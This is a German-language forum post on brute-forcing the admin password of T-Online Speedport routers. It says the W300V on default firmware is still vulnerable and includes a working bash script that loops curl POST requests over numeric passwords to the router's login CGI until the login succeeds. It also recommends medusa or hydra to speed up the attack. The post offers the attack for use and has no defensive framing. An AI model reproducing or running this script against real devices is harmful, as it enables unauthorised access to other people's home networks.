welchen t-online router hast du denn? denn die neuen haben leider eine "server-site"-bruteforce-protection. kann dir nur sagen, dass auf jeden fall das modell speedport w300v noch bruteforcebar ist (mit default firmware).
das würde auf minimaler ebene so aussehen:
#!/bin/bash
for (( c=13970; c<=99999; c++ ))
do
echo "Checking: $c" export i=`curl http://speedport.ip/cgi-bin/login.cgi --data pws=$c --referer "http://speedport.ip/hcti_start_passwort.stm" -# | grep /loginpserr.stm`
if [[ $i != 'This document has moved <A HREF="http://speedport.ip/loginpserr.stm</A>.<P>' ]]; then
echo "password found"
exit
fi
clear
done
mit medusa den vorgang zu "threaden" wäre vorteilhaft, wobei die aktuelle version hierbei noch einen dummen redirect-bug aufweist. dann bleibt noch hydra, dass sich leider nicht so einfach kompilieren lässt unter einem aktuellen linux-system